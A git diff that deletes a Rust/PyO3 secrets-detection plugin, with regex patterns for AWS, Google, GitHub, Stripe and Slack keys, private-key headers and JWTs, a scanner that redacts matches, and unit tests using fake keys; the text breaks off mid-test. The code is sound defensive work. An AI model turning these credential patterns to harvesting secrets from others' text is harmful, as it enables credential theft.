-// -// Stub file generator for secrets_detection module -// -// This binary generates Python type stub files (.pyi) for the secrets_detection module. -// Run with: cargo run --bin stub_gen - -use secrets_detection_rust::stub_info; - -fn main() { - // Get stub info (returns Result) - let stub_info = stub_info().expect("Failed to get stub info"); - - // Generate stub files - paths are determined from pyproject.toml - stub_info.generate().expect("Failed to generate stub file"); - - println!("✓ Generated stub files successfully"); -} diff --git a/plugins_rust/secrets_detection/src/config.rs b/plugins_rust/secrets_detection/src/config.rs deleted file mode 100644 index fcff4225a1..0000000000 --- a/plugins_rust/secrets_detection/src/config.rs +++ /dev/null @@ -1,129 +0,0 @@ -use crate::patterns::PATTERNS; -use std::collections::HashMap; - -#[derive(Debug, Clone)] -pub struct SecretsDetectionConfig { - pub enabled: HashMap, - pub redact: bool, - pub redaction_text: String, - pub block_on_detection: bool, - pub min_findings_to_block: u32, -} - -impl SecretsDetectionConfig { - /// Whether the named pattern is enabled, defaulting to disabled. - pub fn is_enabled(&self, name: &str) -> bool { - self.enabled.get(name).copied().unwrap_or(false) - } -} - -impl Default for SecretsDetectionConfig { - fn default() -> Self { - // Broad heuristic patterns default to disabled so that a partial - // `enabled:` map in plugin YAML never silently turns them on. - const BROAD: &[&str] = &[ - "generic_api_key_assignment", - "jwt_like", - "hex_secret_32", - "base64_24", - ]; - let enabled: HashMap = PATTERNS - .keys() - .map(|&k| (k.to_string(), !BROAD.contains(&k))) - .collect(); - - Self { - enabled, - redact: false, - redaction_text: "***REDACTED***".to_string(), - block_on_detection: true, - min_findings_to_block: 1, - } - } -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_secrets_detection_config_default() { - let config = SecretsDetectionConfig::default(); - - // Verify default values - assert!(!config.redact); - assert_eq!(config.redaction_text, "***REDACTED***"); - assert!(config.block_on_detection); - assert_eq!(config.min_findings_to_block, 1); - - assert_eq!( - config.enabled.len(), - 11, - "Should have 11 patterns configured" - ); - // Broad heuristic patterns should be opt-in (disabled by default) - for broad in &[ - "generic_api_key_assignment", - "jwt_like", - "hex_secret_32", - "base64_24", - ] { - assert_eq!( - config.enabled.get(*broad), - Some(&false), - "Broad pattern '{}' should be opt-in", - broad - ); - } - for (pattern_name, enabled) in config.enabled.iter() { - if [ - "generic_api_key_assignment", - "jwt_like", - "hex_secret_32", - "base64_24", - ] - .contains(&pattern_name.as_str()) - { - continue; - } - assert!( - enabled, - "Pattern '{}' should be enabled by default", - pattern_name - ); - } - } - - #[test] - fn test_secrets_detection_config_custom() { - let mut enabled = HashMap::new(); - enabled.insert("aws_access_key_id".to_string(), true); - enabled.insert("google_api_key".to_string(), false); - - let config = SecretsDetectionConfig { - enabled, - redact: true, - redaction_text: "[REDACTED]".to_string(), - block_on_detection: false, - min_findings_to_block: 3, - }; - - assert!(config.redact); - assert_eq!(config.redaction_text, "[REDACTED]"); - assert!(!config.block_on_detection); - assert_eq!(config.min_findings_to_block, 3); - assert_eq!(config.enabled.get("aws_access_key_id"), Some(&true)); - assert_eq!(config.enabled.get("google_api_key"), Some(&false)); - } - - #[test] - fn test_config_clone() { - let config1 = SecretsDetectionConfig::default(); - let config2 = config1.clone(); - - assert_eq!(config1.redact, config2.redact); - assert_eq!(config1.redaction_text, config2.redaction_text); - assert_eq!(config1.block_on_detection, config2.block_on_detection); - assert_eq!(config1.min_findings_to_block, config2.min_findings_to_block); - } -} diff --git a/plugins_rust/secrets_detection/src/lib.rs b/plugins_rust/secrets_detection/src/lib.rs deleted file mode 100644 index 8166b8f140..0000000000 --- a/plugins_rust/secrets_detection/src/lib.rs +++ /dev/null @@ -1,307 +0,0 @@ -mod config; -mod patterns; -mod scanner; - -use std::collections::HashMap; -use std::fmt; - -use log::{LevelFilter, debug, error, info, warn}; -use pyo3::exceptions::PyAttributeError; -use pyo3::prelude::*; -use pyo3::types::{PyAny, PyDict, PyList, PyString}; -use pyo3_stub_gen::define_stub_info_gatherer; -use pyo3_stub_gen::derive::*; - -pub use config::SecretsDetectionConfig; -pub use patterns::PATTERNS; -pub use scanner::{detect_and_redact, scan_container}; - -/// Scan Python container for secrets using optimized type dispatch -/// -#[gen_stub_pyfunction] -#[pyfunction] -fn py_scan_container<'py>( - py: Python<'py>, - container: Bound<'py, PyAny>, - config: Bound<'py, PyAny>, -) -> PyResult<(usize, Bound<'py, PyAny>, Bound<'py, PyList>)> { - let container_kind = describe_python_type(&container); - debug!( - "Starting Rust secrets scan for container_type={} at top level", - container_kind - ); - - let result = (|| { - let cfg = SecretsDetectionConfig::try_from(&config)?; - - let (count, redacted, findings) = if container.is_instance_of::() { - let text = container.extract::()?; - let (fs, redacted_str) = detect_and_redact(&text, &cfg); - - let findings_list = PyList::empty(py); - for finding in &fs { - let finding_dict = PyDict::new(py); - finding_dict.set_item("type", &finding.pii_type)?; - finding_dict.set_item("match", &finding.preview)?; - findings_list.append(finding_dict)?; - } - - ( - fs.len(), - PyString::new(py, &redacted_str).into_any(), - findings_list, - ) - } else if container.is_instance_of::() || container.is_instance_of::() { - scan_container(py, &container, &cfg)? - } else { - let findings = PyList::empty(py); - (0, container.clone(), findings) - }; - - debug!( - "Rust secrets scan finished for container_type={} with findings_count={}", - container_kind, count - ); - Ok((count, redacted, findings)) - })(); - - if let Err(err) = &result { - error!( - "Rust secrets scan failed for container_type={}: {}", - container_kind, err - ); - } - - result -} - -#[pymodule] -fn secrets_detection_rust(m: &Bound<'_, PyModule>) -> PyResult<()> { - init_python_logging(m.py())?; - m.add_function(wrap_pyfunction!(py_scan_container, m)?)?; - info!("secrets_detection_rust module initialized"); - Ok(()) -} - -// Define stub info gatherer for generating Python type stubs -define_stub_info_gatherer!(stub_info); - -/// Helper function to extract and convert Python attributes with custom error type -fn extract_attr<'py, T>( - obj: &Bound<'py, PyAny>, - attr_name: &str, - expected_type: &str, -) -> PyResult -where - T: for<'a> FromPyObject<'a, 'a>, -{ - obj.getattr(attr_name) - .map_err(|_| -> PyErr { - error!("Missing required config attribute '{}'", attr_name); - AttributeError::Missing { - attr_name: attr_name.to_string(), - } - .into() - }) - .and_then(|attr| { - attr.extract().map_err(|_| -> PyErr { - error!( - "Invalid type for config attribute '{}'; expected {}", - attr_name, expected_type - ); - AttributeError::InvalidType { - attr_name: attr_name.to_string(), - expected_type: expected_type.to_string(), - } - .into() - }) - }) -} - -/// TryFrom implementation for extracting SecretsDetectionConfig from Python objects -impl<'py> TryFrom<&Bound<'py, PyAny>> for SecretsDetectionConfig { - type Error = PyErr; - - fn try_from(obj: &Bound<'py, PyAny>) -> PyResult { - let enabled: HashMap = extract_attr(obj, "enabled", "Dict[str, bool]")?; - let redact = extract_attr(obj, "redact", "bool")?; - let redaction_text = extract_attr(obj, "redaction_text", "str")?; - let block_on_detection = extract_attr(obj, "block_on_detection", "bool")?; - let min_findings_to_block = extract_attr(obj, "min_findings_to_block", "int")?; - - debug!( - "Loaded Rust secrets detection config: enabled_patterns={}, redact={}, block_on_detection={}, min_findings_to_block={}", - enabled.len(), - redact, - block_on_detection, - min_findings_to_block - ); - - Ok(SecretsDetectionConfig { - enabled, - redact, - redaction_text, - block_on_detection, - min_findings_to_block, - }) - } -} - -fn init_python_logging(py: Python<'_>) -> PyResult<()> { - let logger = pyo3_log::Logger::new(py, pyo3_log::Caching::Nothing)? - .filter(LevelFilter::Trace) - .filter_target("pyo3".to_string(), LevelFilter::Info); - - match logger.install() { - Ok(_handle) => { - info!("Initialized PyO3 log bridge for secrets_detection_rust"); - Ok(()) - } - Err(err) => { - warn!( - "PyO3 log bridge for secrets_detection_rust already initialized or unavailable: {}", - err - ); - Ok(()) - } - } -} - -fn describe_python_type(container: &Bound<'_, PyAny>) -> &'static str { - if container.is_instance_of::() { - "str" - } else if container.is_instance_of::() { - "dict" - } else if container.is_instance_of::() { - "list" - } else { - "other" - } -} - -/// Custom error type for attribute extraction -#[derive(Debug)] -enum AttributeError { - Missing { - attr_name: String, - }, - InvalidType { - attr_name: String, - expected_type: String, - }, -} - -impl fmt::Display for AttributeError { - fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { - match self { - AttributeError::Missing { attr_name } => { - write!(f, "Missing required attribute '{}'", attr_name) - } - AttributeError::InvalidType { - attr_name, - expected_type, - } => { - write!( - f, - "Invalid type for '{}', expected {}", - attr_name, expected_type - ) - } - } - } -} - -impl std::error::Error for AttributeError {} - -impl From for PyErr { - fn from(err: AttributeError) -> PyErr { - PyAttributeError::new_err(err.to_string()) - } -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_attribute_error_missing_display() { - let err = AttributeError::Missing { - attr_name: "test_attr".to_string(), - }; - let display = format!("{}", err); - assert_eq!(display, "Missing required attribute 'test_attr'"); - } - - #[test] - fn test_attribute_error_invalid_type_display() { - let err = AttributeError::InvalidType { - attr_name: "test_attr".to_string(), - expected_type: "str".to_string(), - }; - let display = format!("{}", err); - assert_eq!(display, "Invalid type for 'test_attr', expected str"); - } - - #[test] - fn test_attribute_error_missing_debug() { - let err = AttributeError::Missing { - attr_name: "test".to_string(), - }; - let debug = format!("{:?}", err); - assert!(debug.contains("Missing")); - assert!(debug.contains("test")); - } - - #[test] - fn test_attribute_error_invalid_type_debug() { - let err = AttributeError::InvalidType { - attr_name: "field".to_string(), - expected_type: "bool".to_string(), - }; - let debug = format!("{:?}", err); - assert!(debug.contains("InvalidType")); - assert!(debug.contains("field")); - assert!(debug.contains("bool")); - } - - #[test] - fn test_attribute_error_is_error_trait() { - let err = AttributeError::Missing { - attr_name: "test".to_string(), - }; - // Verify it implements std::error::Error - let _: &dyn std::error::Error = &err; - } - - #[test] - fn test_attribute_error_display_with_special_chars() { - let err = AttributeError::Missing { - attr_name: "test_attr_123".to_string(), - }; - let display = format!("{}", err); - assert_eq!(display, "Missing required attribute 'test_attr_123'"); - } - - #[test] - fn test_attribute_error_display_with_complex_type() { - let err = AttributeError::InvalidType { - attr_name: "config".to_string(), - expected_type: "Dict[str, bool]".to_string(), - }; - let display = format!("{}", err); - assert_eq!( - display, - "Invalid type for 'config', expected Dict[str, bool]" - ); - } - - #[test] - fn test_attribute_error_conversion_exists() { - fn _assert_conversion>(_: T) {} - - let err = AttributeError::Missing { - attr_name: "test".to_string(), - }; - _assert_conversion(err); - } -} diff --git a/plugins_rust/secrets_detection/src/patterns.rs b/plugins_rust/secrets_detection/src/patterns.rs deleted file mode 100644 index 8fa45e1e8d..0000000000 --- a/plugins_rust/secrets_detection/src/patterns.rs +++ /dev/null @@ -1,423 +0,0 @@ -use regex::Regex; -use std::collections::HashMap; -use std::sync::LazyLock; - -/// Regex patterns for complex secret detection -pub static PATTERNS: LazyLock> = LazyLock::new(|| { - let mut m = HashMap::new(); - m.insert( - "aws_access_key_id", - Regex::new(r"\bAKIA[0-9A-Z]{16}\b") - .expect("Failed to compile AWS Access Key ID regex pattern"), - ); - m.insert( - "aws_secret_access_key", - Regex::new(r"(?i)aws.{0,20}(?:secret|access).{0,20}=\s*([A-Za-z0-9/+=]{40})") - .expect("Failed to compile AWS Secret Access Key regex pattern"), - ); - m.insert( - "google_api_key", - Regex::new(r"\bAIza[0-9A-Za-z\-_]{35}\b") - .expect("Failed to compile Google API Key regex pattern"), - ); - m.insert( - "github_token", - Regex::new(r"\b(?:gh[opusr]_[A-Za-z0-9]{36}|github_pat_[A-Za-z0-9_]{20,})\b") - .expect("Failed to compile GitHub Token regex pattern"), - ); - m.insert( - "stripe_secret_key", - Regex::new(r"\b(?:sk|rk)_(?:live|test)_[A-Za-z0-9]{16,}\b") - .expect("Failed to compile Stripe Secret Key regex pattern"), - ); - m.insert( - "generic_api_key_assignment", - Regex::new( - r#"(?ix)\b(?:(?:x[-_])?api[-_]?key|apikey|api[_-]?token|access[_-]?token|bearer[_-]?token|auth[_-]?token)\b\s*[:=]\s*['"]?[A-Za-z0-9_\-]{20,}['"]?"#, - ) - .expect("Failed to compile Generic API Key Assignment regex pattern"), - ); - m.insert( - "slack_token", - Regex::new(r"\bxox[abpqr]-[0-9A-Za-z\-]{10,48}\b") - .expect("Failed to compile Slack Token regex pattern"), - ); - m.insert( - "private_key_block", - Regex::new(r"-----BEGIN (?:RSA|DSA|EC|OPENSSH) PRIVATE KEY-----") - .expect("Failed to compile Private Key Block regex pattern"), - ); - m.insert( - "jwt_like", - Regex::new(r"\beyJ[a-zA-Z0-9_\-]{10,}\.eyJ[a-zA-Z0-9_\-]{10,}\.[a-zA-Z0-9_\-]{10,}\b") - .expect("Failed to compile JWT-like regex pattern"), - ); - m.insert( - "hex_secret_32", - Regex::new(r"(?i)\b[a-f0-9]{32,}\b").expect("Failed to compile Hex Secret regex pattern"), - ); - m.insert( - "base64_24", - Regex::new(r"\b[A-Za-z0-9+/]{24,}={0,2}\b") - .expect("Failed to compile Base64 regex pattern"), - ); - m -}); - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_patterns_initialization() { - // Verify all expected patterns are present - assert!(PATTERNS.contains_key("aws_access_key_id")); - assert!(PATTERNS.contains_key("aws_secret_access_key")); - assert!(PATTERNS.contains_key("google_api_key")); - assert!(PATTERNS.contains_key("github_token")); - assert!(PATTERNS.contains_key("stripe_secret_key")); - assert!(PATTERNS.contains_key("generic_api_key_assignment")); - assert!(PATTERNS.contains_key("slack_token")); - assert!(PATTERNS.contains_key("private_key_block")); - assert!(PATTERNS.contains_key("jwt_like")); - assert!(PATTERNS.contains_key("hex_secret_32")); - assert!(PATTERNS.contains_key("base64_24")); - assert_eq!(PATTERNS.len(), 11); - } - - #[test] - fn test_aws_access_key_id_pattern() { - let pattern = PATTERNS.get("aws_access_key_id").unwrap(); - - // Valid AWS access key IDs - assert!( - pattern.is_match("AKIAFAKE12345EXAMPLE"), - "Should match valid AWS access key ID" - ); - assert!( - pattern.is_match("AKIAFAKE67890EXAMPLE"), - "Should match valid AWS access key ID" - ); - - // Invalid patterns - assert!(!pattern.is_match("AKIA123"), "Should not match: too short"); - assert!( - !pattern.is_match("BKIAFAKE12345EXAMPLE"), - "Should not match: wrong prefix" - ); - assert!( - !pattern.is_match("akiafake12345example"), - "Should not match: lowercase" - ); - } - - #[test] - fn test_aws_secret_access_key_pattern() { - let pattern = PATTERNS.get("aws_secret_access_key").unwrap(); - - // Valid AWS secret patterns - assert!( - pattern.is_match("aws_secret_access_key = FAKESecretAccessKeyForTestingEXAMPLE0000"), - "Should match valid AWS secret access key" - ); - assert!( - pattern.is_match("AWS_SECRET=FAKESecretAccessKeyForTestingEXAMPLE0000"), - "Should match valid AWS secret" - ); - assert!( - pattern.is_match("aws access key=FAKESecretAccessKeyForTestingEXAMPLE0000"), - "Should match valid AWS access key" - ); - - // Invalid patterns - assert!( - !pattern.is_match("aws_secret = short"), - "Should not match: too short" - ); - } - - #[test] - fn test_google_api_key_pattern() { - let pattern = PATTERNS.get("google_api_key").unwrap(); - - // Valid Google API keys (AIza + exactly 35 chars) - assert!( - pattern.is_match("AIzaFAKE_KEY_FOR_TESTING_ONLY_fake12345"), - "Should match valid Google API key" - ); - assert!( - pattern.is_match("AIzaFAKE_KEY_FOR_TESTING_ONLY_fake56789"), - "Should match valid Google API key" - ); - - // Invalid patterns - assert!(!pattern.is_match("AIza123"), "Should not match: too short"); - assert!( - !pattern.is_match("BIzaFAKE_KEY_FOR_TESTING_ONLY_fake12345"), - "Should not match: wrong prefix" - ); - } - - #[test] - fn test_github_token_pattern() { - let pattern = PATTERNS.get("github_token").unwrap(); - - assert!( - pattern.is_match("ghp_1234567890abcdefghijklmnopqrstuvwxyZ"), // pragma: allowlist secret - "Should match GitHub classic token" - ); - assert!( - pattern.is_match("ghs_1234567890abcdefghijklmnopqrstuvwxyZ"), // pragma: allowlist secret - "Should match GitHub server token" - ); - assert!( - pattern.is_match( - "github_pat_abcdefghijklmnopqrstuvwxyz_ABCDEFGHIJKLMNOPQRSTUVWXYZ12", // pragma: allowlist secret - ), - "Should match GitHub fine-grained PAT" - ); - - assert!( - !pattern.is_match("github_token=short"), - "Should not match short GitHub-like strings" - ); - assert!( - !pattern.is_match("github_pat_short"), - "Should not match short fine-grained PAT-like strings" - ); - assert!( - !pattern.is_match("ghp_documentation_example"), - "Should not match prose/example fragments" - ); - } - - #[test] - fn test_stripe_secret_key_pattern() { - let pattern = PATTERNS.get("stripe_secret_key").unwrap(); - let live_secret = format!("{}_{}_{}", "sk", "live", "1234567890abcdefghijklmnop"); // pragma: allowlist secret - let restricted_test_key = format!("{}_{}_{}", "rk", "test", "1234567890abcdefghijklmnop"); // pragma: allowlist secret - let publishable_key = format!("{}_{}_{}", "pk", "live", "1234567890abcdefghijklmnop"); // pragma: allowlist secret - - assert!( - pattern.is_match(&live_secret), - "Should match Stripe live secret keys" - ); - assert!( - pattern.is_match(&restricted_test_key), - "Should match Stripe restricted test keys" - ); - - assert!( - !pattern.is_match(&publishable_key), - "Should not match publishable Stripe keys" - ); - assert!( - !pattern.is_match("sk_live_short"), - "Should not match short Stripe-like strings" - ); - } - - #[test] - fn test_generic_api_key_assignment_pattern() { - let pattern = PATTERNS.get("generic_api_key_assignment").unwrap(); - - assert!( - pattern.is_match("X-API-Key: test12345678901234567890"), // pragma: allowlist secret - "Should match X-API-Key header" - ); - assert!( - pattern.is_match("api_key=my_service_token_1234567890"), // pragma: allowlist secret - "Should match api_key assignment" - ); - assert!( - pattern.is_match("access_token = 'abcdefghijklmnopqrstuvwx'"), - "Should match quoted access_token assignment" - ); - - assert!( - !pattern.is_match("api_key=short"), - "Should not match short values" - ); - assert!( - !pattern.is_match("api key rotation is enabled"), - "Should not match prose without assignment" - ); - } - - #[test] - fn test_slack_token_pattern() { - let pattern = PATTERNS.get("slack_token").unwrap(); - - // Valid Slack tokens (using xoxr- prefix to avoid push protection false positives) - assert!( - pattern.is_match("xoxr-fake-000000000-fake000000000-fakefakefakefake"), - "Should match valid Slack refresh token" - ); - assert!( - pattern.is_match("xoxq-fake000000"), - "Should match valid Slack token" - ); - assert!( - pattern.is_match("xoxr-fake-000000000-fake000000000-fakefakefakefake"), - "Should match valid Slack token" - ); - - // Invalid patterns - assert!( - !pattern.is_match("xoxz-123"), - "Should not match: wrong token type" - ); - assert!( - !pattern.is_match("yoxr-fake000000"), - "Should not match: wrong prefix" - ); - } - - #[test] - fn test_private_key_block_pattern() { - let pattern = PATTERNS.get("private_key_block").unwrap(); - - // Valid private key headers - assert!( - pattern.is_match("-----BEGIN RSA PRIVATE KEY-----"), - "Should match RSA private key header" - ); - assert!( - pattern.is_match("-----BEGIN DSA PRIVATE KEY-----"), - "Should match DSA private key header" - ); - assert!( - pattern.is_match("-----BEGIN EC PRIVATE KEY-----"), - "Should match EC private key header" - ); - assert!( - pattern.is_match("-----BEGIN OPENSSH PRIVATE KEY-----"), - "Should match OpenSSH private key header" - ); - - // Invalid patterns - assert!( - !pattern.is_match("-----BEGIN PUBLIC KEY-----"), - "Should not match: public key" - ); - assert!( - !pattern.is_match("-----BEGIN CERTIFICATE-----"), - "Should not match: certificate" - ); - } - - #[test] - fn test_jwt_like_pattern() { - let pattern = PATTERNS.get("jwt_like").unwrap(); - - // Valid JWT-like tokens - assert!( - pattern.is_match("eyJfake_header_12345.eyJfake_payload_1234.fake_signature_12345678"), - "Should match valid JWT token" - ); - - // Invalid patterns - assert!( - !pattern.is_match("eyJ.eyJ.abc"), - "Should not match: too short" - ); - assert!( - !pattern.is_match("abc.def.ghi"), - "Should not match: wrong prefix" - ); - } - - #[test] - fn test_hex_secret_32_pattern() { - let pattern = PATTERNS.get("hex_secret_32").unwrap(); - - // Valid hex secrets (32+ chars) - assert!( - pattern.is_match("a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6"), - "Should match valid 32-char hex secret" - ); - assert!( - pattern.is_match("ABCDEF1234567890ABCDEF1234567890"), - "Should match valid uppercase hex secret" - ); - assert!( - pattern.is_match("0123456789abcdef0123456789abcdef"), - "Should match valid hex secret" - ); - - // Invalid patterns - assert!( - !pattern.is_match("a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5"), - "Should not match: too short (31 chars)" - ); - assert!( - !pattern.is_match("g1h2i3j4k5l6m7n8o9p0q1r2s3t4u5v6"), - "Should not match: invalid hex chars" - ); - } - - #[test] - fn test_base64_24_pattern() { - let pattern = PATTERNS.get("base64_24").unwrap(); - - // Valid base64 strings (24+ chars) - assert!( - pattern.is_match("dGhpcyBpcyBhIHRlc3Qgc3RyaW5n"), - "Should match valid base64 string" - ); - assert!( - pattern.is_match("YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXo="), - "Should match valid base64 string with padding" - ); - assert!( - pattern.is_match("MTIzNDU2Nzg5MDEyMzQ1Njc4OTA=="), - "Should match valid base64 string with double padding" - ); - - // Invalid patterns - assert!( - !pattern.is_match("dGhpcyBpcyBhIHRlc3Q"), - "Should not match: too short (< 24 chars)" - ); - } - - #[test] - fn test_pattern_matching_real_world_aws() { - let aws_key_pattern = PATTERNS.get("aws_access_key_id").unwrap(); - let aws_secret_pattern = PATTERNS.get("aws_secret_access_key").unwrap(); - - let text = r#" - AWS_ACCESS_KEY_ID=AKIAFAKE12345EXAMPLE - AWS_SECRET_ACCESS_KEY=FAKESecretAccessKeyForTestingEXAMPLE0000 - "#; - - assert!( - aws_key_pattern.is_match(text), - "Should detect AWS access key in real-world text" - ); - assert!( - aws_secret_pattern.is_match(text), - "Should detect AWS secret key in real-world text" - ); - } - - #[test] - fn test_pattern_matching_real_world_mixed() { - let jwt_pattern = PATTERNS.get("jwt_like").unwrap(); - let hex_pattern = PATTERNS.get("hex_secret_32").unwrap(); - - let text = r#" - Authorization: Bearer eyJfake_header_12345.eyJfake_payload_1234.fake_signature_12345678 - API_SECRET=a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2 - "#; - - assert!( - jwt_pattern.is_match(text), - "Should detect JWT token in real-world text" - ); - assert!( - hex_pattern.is_match(text), - "Should detect hex secret in real-world text" - ); - } -} diff --git a/plugins_rust/secrets_detection/src/scanner.rs b/plugins_rust/secrets_detection/src/scanner.rs deleted file mode 100644 index 094e533e69..0000000000 --- a/plugins_rust/secrets_detection/src/scanner.rs +++ /dev/null @@ -1,802 +0,0 @@ -use log::{debug, trace}; -use pyo3::prelude::*; -use pyo3::types::{PyAny, PyDict, PyList, PyString}; - -use crate::config::SecretsDetectionConfig; -use crate::patterns::PATTERNS; - -/// A single secret detection finding -#[derive(Debug, Clone)] -pub struct Finding { - pub pii_type: String, - pub preview: String, -} - -/// Recursively scan Python container for secrets using direct PyO3 traversal -/// -/// This avoids JSON serialization overhead by working directly with Python objects. -/// Similar to the PII filter's approach for better performance on large payloads. -/// -/// Returns (total_count, redacted_container, findings) -pub fn scan_container<'py>( - py: Python<'py>, - container: &Bound<'py, PyAny>, - cfg: &SecretsDetectionConfig, -) -> PyResult<(usize, Bound<'py, PyAny>, Bound<'py, PyList>)> { - trace!("Scanning nested Python container in Rust"); - let mut total = 0; - let findings = PyList::empty(py); - - // Handle strings directly - if let Ok(text) = container.extract::() { - let (fs, redacted_str) = detect_and_redact(&text, cfg); - total += fs.len(); - - // Add findings to list - for finding in fs { - let finding_dict = PyDict::new(py); - finding_dict.set_item("type", finding.pii_type)?; - finding_dict.set_item("match", finding.preview)?; - findings.append(finding_dict)?; - } - - let redacted_py = PyString::new(py, &redacted_str); - return Ok((total, redacted_py.into_any(), findings)); - } - - // Handle dictionaries - if let Ok(dict) = container.cast::() { - let new_dict = PyDict::new(py); - - for (key, value) in dict.iter() { - let (count, redacted_value, value_findings) = scan_container(py, &value, cfg)?; - total += count; - - // Merge findings - for finding in value_findings.iter() { - findings.append(finding)?; - } - - new_dict.set_item(key, redacted_value)?; - } - - return Ok((total, new_dict.into_any(), findings)); - } - - // Handle lists - if let Ok(list) = container.cast::() { - let new_list = PyList::empty(py); - - for item in list.iter() { - let (count, redacted_item, item_findings) = scan_container(py, &item, cfg)?; - total += count; - - // Merge findings - for finding in item_findings.iter() { - findings.append(finding)?; - } - - new_list.append(redacted_item)?; - } - - return Ok((total, new_list.into_any(), findings)); - } - - // Other types: no processing (numbers, booleans, None, etc.) - Ok((0, container.clone(), findings)) -} - -/// Combined detection and redaction in a single pass -/// -/// Returns (findings, redacted_text) -pub fn detect_and_redact(text: &str, cfg: &SecretsDetectionConfig) -> (Vec, String) { - let mut findings = Vec::new(); - - // Single pass: detect from original text, redact if enabled - let mut redacted = text.to_string(); - - for (name, pat) in PATTERNS.iter() { - if !cfg.is_enabled(name) { - continue; - } - - let findings_before = findings.len(); - - // Always detect from the original text to avoid false positives from redaction - for m in pat.find_iter(text) { - let mat = m.as_str(); - let preview = if mat.len() > 8 { - format!("{}…", &mat[..8]) - } else { - mat.to_string() - }; - - findings.push(Finding { - pii_type: name.to_string(), - preview, - }); - } - - let findings_added = findings.len() - findings_before; - if findings_added > 0 { - debug!( - "Pattern '{}' matched {} finding(s) in Rust secrets detection", - name, findings_added - ); - } - - // Redact matches if redaction is enabled - if cfg.redact { - redacted = pat.replace_all(&redacted, &cfg.redaction_text).into_owned(); - } - } - - debug!( - "Rust detect_and_redact completed with {} total finding(s)", - findings.len() - ); - (findings, redacted) -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_detect_and_redact_no_secrets() { - let cfg = SecretsDetectionConfig { - redact: true, - ..Default::default() - }; - - let text = "This is a normal string with no secrets"; - let (findings, redacted) = detect_and_redact(text, &cfg); - - assert_eq!(findings.len(), 0); - assert_eq!(redacted, text); - } - - #[test] - fn test_detect_and_redact_aws_key() { - let cfg = SecretsDetectionConfig { - redact: true, - redaction_text: "***REDACTED***".to_string(), - ..Default::default() - }; - - let text = "AWS_ACCESS_KEY_ID=AKIAFAKE12345EXAMPLE"; - let (findings, redacted) = detect_and_redact(text, &cfg); - - assert_eq!(findings.len(), 1); - assert_eq!(findings[0].pii_type, "aws_access_key_id"); - assert_eq!(findings[0].preview, "AKIAFAKE…"); - assert_eq!(redacted, "AWS_ACCESS_KEY_ID=***REDACTED***"); - } - - #[test] - fn test_detect_and_redact_multiple_secrets() { - let cfg = SecretsDetectionConfig { - redact: true, - redaction_text: "[REDACTED]".to_string(), - ..Default::default() - }; - - let text = "Key: AKIAFAKE12345EXAMPLE and token: xoxr-fake-000000000-fake000000000-fakefakefakefake"; - let (findings, redacted) = detect_and_redact(text, &cfg); - - assert!(findings.len() >= 2, "Should detect at least 2 secrets"); - assert!(redacted.contains("[REDACTED]")); - assert!(!redacted.contains("AKIAFAKE12345EXAMPLE")); - assert!(!redacted.contains("xoxr-fake-000000")); - } - - #[test] - fn test_detect_and_redact_without_redaction() { - let cfg = SecretsDetectionConfig { - redact: false, - ..Default::default() - }; - - let text = "AWS_ACCESS_KEY_ID=AKIAFAKE12345EXAMPLE"; - let (findings, redacted) = detect_and_redact(text, &cfg); - - assert_eq!(findings.len(), 1); - assert_eq!(redacted, text); // Should not be redacted - } - - #[test] - fn test_detect_and_redact_disabled_pattern() { - let mut enabled = std::collections::HashMap::new(); - enabled.insert("aws_access_key_id".to_string(), false); - enabled.insert("slack_token".to_string(), true); - - let cfg = SecretsDetectionConfig { - enabled, - redact: true, - redaction_text: "***".to_string(), - ..Default::default() - }; - - let text = "Key: AKIAFAKE12345EXAMPLE and token: xoxr-fake-000000000-fake000000000-fakefakefakefake"; - let (findings, redacted) = detect_and_redact(text, &cfg); - - // At least slack_token should be detected (may also match base64_24) - assert!(!findings.is_empty(), "Should detect at least slack_token"); - assert!( - findings.iter().any(|f| f.pii_type == "slack_token"), - "Should detect slack_token" - ); - assert!(redacted.contains("AKIAFAKE12345EXAMPLE")); // AWS key not redacted - assert!(!redacted.contains("xoxr-fake-000000")); // Slack token redacted - } - - #[test] - fn test_detect_and_redact_hex_and_base64() { - let mut cfg = SecretsDetectionConfig { - redact: true, - ..Default::default() - }; - cfg.enabled.insert("hex_secret_32".to_string(), true); - cfg.enabled.insert("base64_24".to_string(), true); - - // Test that hex secrets are detected - let hex_text = "secret=0123456789abcdef0123456789abcdef"; - let (hex_findings, _) = detect_and_redact(hex_text, &cfg); - assert!(!hex_findings.is_empty(), "Should detect hex secrets"); - - // Test that base64 secrets are detected - let base64_text = "token=SGVsbG8gV29ybGQgdGhpcyBpcyBhIGxvbmcgYmFzZTY0IGVuY29kZWQgc3RyaW5n"; - let (b64_findings, _) = detect_and_redact(base64_text, &cfg); - assert!(!b64_findings.is_empty(), "Should detect base64 secrets"); - } - - #[test] - fn test_detect_and_redact_google_api_key() { - let cfg = SecretsDetectionConfig { - redact: true, - redaction_text: "[REDACTED]".to_string(), - ..Default::default() - }; - - let text = "GOOGLE_API_KEY=AIzaFAKE_KEY_FOR_TESTING_ONLY_fake12345"; - let (findings, redacted) = detect_and_redact(text, &cfg); - - assert!(!findings.is_empty()); - assert!(findings.iter().any(|f| f.pii_type == "google_api_key")); - assert!(redacted.contains("[REDACTED]")); - assert!(!redacted.contains("AIzaFAKE_KEY_FOR_TEST")); - } - - #[test] - fn test_detect_and_redact_slack_token() { - let cfg = SecretsDetectionConfig { - redact: true, - ..Default::default() - }; - - let text = "SLACK_TOKEN=xoxr-fake-000000000-fake000000000-fakefakefakefake"; - let (findings, redacted) = detect_and_redact(text, &cfg); - - assert!(!findings.is_empty()); - assert!(findings.iter().any(|f| f.pii_type == "slack_token")); - assert!(redacted.contains("***REDACTED***")); - } - - #[test] - fn test_detect_and_redact_private_key() { - let cfg = SecretsDetectionConfig { - redact: true, - ..Default::default() - }; - - let text = "-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEA..."; - let (findings, redacted) = detect_and_redact(text, &cfg); - - assert!(!findings.is_empty()); - assert!(findings.iter().any(|f| f.pii_type == 